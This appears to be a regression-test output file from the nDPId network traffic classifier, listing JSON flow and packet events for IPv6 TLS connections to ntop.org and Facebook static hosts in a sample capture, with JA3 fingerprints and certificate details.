00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="}
00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="}
00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="}
00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
